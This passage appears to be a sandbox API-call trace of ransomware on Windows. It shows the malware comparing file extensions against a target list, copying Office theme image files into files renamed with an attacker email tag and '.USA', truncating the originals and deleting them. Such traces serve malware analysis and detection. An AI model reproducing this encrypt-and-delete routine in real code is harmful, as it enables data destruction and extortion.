lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.249] lstrlenW (lpString=".ppt") returned 4 [0047.249] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString=".zip") returned 4 [0047.249] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString=".rar") returned 4 [0047.249] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString=".bz2") returned 4 [0047.249] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.249] lstrlenW (lpString=".7z") returned 3 [0047.249] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString=".dbf") returned 4 [0047.249] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString=".1cd") returned 4 [0047.249] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString=".jpg") returned 4 [0047.249] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.249] lstrlenW (lpString=".doc") returned 4 [0047.249] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.249] lstrlenW (lpString=".docx") returned 5 [0047.249] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.249] lstrlenW (lpString=".pdf") returned 4 [0047.249] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".xls") returned 4 [0047.250] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".xlsx") returned 5 [0047.250] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.250] lstrlenW (lpString=".ppt") returned 4 [0047.250] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.250] lstrlenW (lpString=".zip") returned 4 [0047.250] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".rar") returned 4 [0047.250] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".bz2") returned 4 [0047.250] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.250] lstrlenW (lpString=".7z") returned 3 [0047.250] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.250] lstrlenW (lpString=".dbf") returned 4 [0047.250] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.250] lstrlenW (lpString=".1cd") returned 4 [0047.250] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.250] lstrlenW (lpString=".jpg") returned 4 [0047.250] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.250] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.250] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.251] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=37112) returned 1 [0047.251] CloseHandle (hObject=0x210) returned 1 [0047.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20 [0047.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.251] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.251] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.251] GetLastError () returned 0x0 [0047.251] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x90f8, lpOverlapped=0x0) returned 1 [0047.254] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9100, lpOverlapped=0x0) returned 1 [0047.255] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.255] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.255] SetEndOfFile (hFile=0x1ec) returned 1 [0047.255] CloseHandle (hObject=0x1ec) returned 1 [0047.255] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.255] SetEndOfFile (hFile=0x210) returned 1 [0047.256] CloseHandle (hObject=0x210) returned 1 [0047.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.257] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.259] lstrlenW (lpString=".doc") returned 4 [0047.259] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".docx") returned 5 [0047.259] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.259] lstrlenW (lpString=".pdf") returned 4 [0047.259] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".xls") returned 4 [0047.259] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".xlsx") returned 5 [0047.259] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.259] lstrlenW (lpString=".ppt") returned 4 [0047.259] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.259] lstrlenW (lpString=".zip") returned 4 [0047.259] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".rar") returned 4 [0047.259] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".bz2") returned 4 [0047.259] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".7z") returned 3 [0047.259] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".dbf") returned 4 [0047.260] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".1cd") returned 4 [0047.260] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".jpg") returned 4 [0047.260] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".doc") returned 4 [0047.260] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString=".docx") returned 5 [0047.260] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.260] lstrlenW (lpString=".pdf") returned 4 [0047.260] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString=".xls") returned 4 [0047.260] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString=".xlsx") returned 5 [0047.260] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.260] lstrlenW (lpString=".ppt") returned 4 [0047.260] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".zip") returned 4 [0047.260] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString=".rar") returned 4 [0047.260] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString=".bz2") returned 4 [0047.260] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString=".7z") returned 3 [0047.260] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.260] lstrlenW (lpString=".dbf") returned 4 [0047.260] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.261] lstrlenW (lpString=".1cd") returned 4 [0047.261] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0047.261] lstrlenW (lpString=".jpg") returned 4 [0047.261] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.261] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.261] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.262] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1666) returned 1 [0047.262] CloseHandle (hObject=0x210) returned 1 [0047.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 0x20 [0047.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.262] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.262] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.264] GetLastError () returned 0x0 [0047.264] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x682, lpOverlapped=0x0) returned 1 [0047.265] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x690, lpOverlapped=0x0) returned 1 [0047.266] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.266] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.266] SetEndOfFile (hFile=0x1b8) returned 1 [0047.266] CloseHandle (hObject=0x1b8) returned 1 [0047.266] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.266] SetEndOfFile (hFile=0x210) returned 1 [0047.267] CloseHandle (hObject=0x210) returned 1 [0047.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.268] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.268] lstrlenW (lpString=".doc") returned 4 [0047.268] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString=".docx") returned 5 [0047.268] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.268] lstrlenW (lpString=".pdf") returned 4 [0047.268] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".xls") returned 4 [0047.268] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".xlsx") returned 5 [0047.268] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.268] lstrlenW (lpString=".ppt") returned 4 [0047.268] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.268] lstrlenW (lpString=".zip") returned 4 [0047.268] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".rar") returned 4 [0047.268] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".bz2") returned 4 [0047.268] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString=".7z") returned 3 [0047.268] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.268] lstrlenW (lpString=".dbf") returned 4 [0047.268] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".1cd") returned 4 [0047.269] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".jpg") returned 4 [0047.269] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".doc") returned 4 [0047.269] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString=".docx") returned 5 [0047.269] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.269] lstrlenW (lpString=".pdf") returned 4 [0047.269] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".xls") returned 4 [0047.269] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".xlsx") returned 5 [0047.269] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.269] lstrlenW (lpString=".ppt") returned 4 [0047.269] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".zip") returned 4 [0047.269] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".rar") returned 4 [0047.269] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".bz2") returned 4 [0047.269] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString=".7z") returned 3 [0047.269] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".dbf") returned 4 [0047.269] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.269] lstrlenW (lpString=".1cd") returned 4 [0047.269] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74 [0047.270] lstrlenW (lpString=".jpg") returned 4 [0047.270] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.270] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.270] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.270] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=19563) returned 1 [0047.270] CloseHandle (hObject=0x210) returned 1 [0047.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20 [0047.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.270] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.270] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.271] GetLastError () returned 0x0 [0047.271] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x4c6b, lpOverlapped=0x0) returned 1 [0047.273] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x4c70, lpOverlapped=0x0) returned 1 [0047.274] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.274] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.274] SetEndOfFile (hFile=0x1b8) returned 1 [0047.274] CloseHandle (hObject=0x1b8) returned 1 [0047.274] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.274] SetEndOfFile (hFile=0x210) returned 1 [0047.275] CloseHandle (hObject=0x210) returned 1 [0047.275] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.275] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".doc") returned 4 [0047.276] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString=".docx") returned 5 [0047.276] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.276] lstrlenW (lpString=".pdf") returned 4 [0047.276] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString=".xls") returned 4 [0047.276] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.276] lstrlenW (lpString=".xlsx") returned 5 [0047.276] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.276] lstrlenW 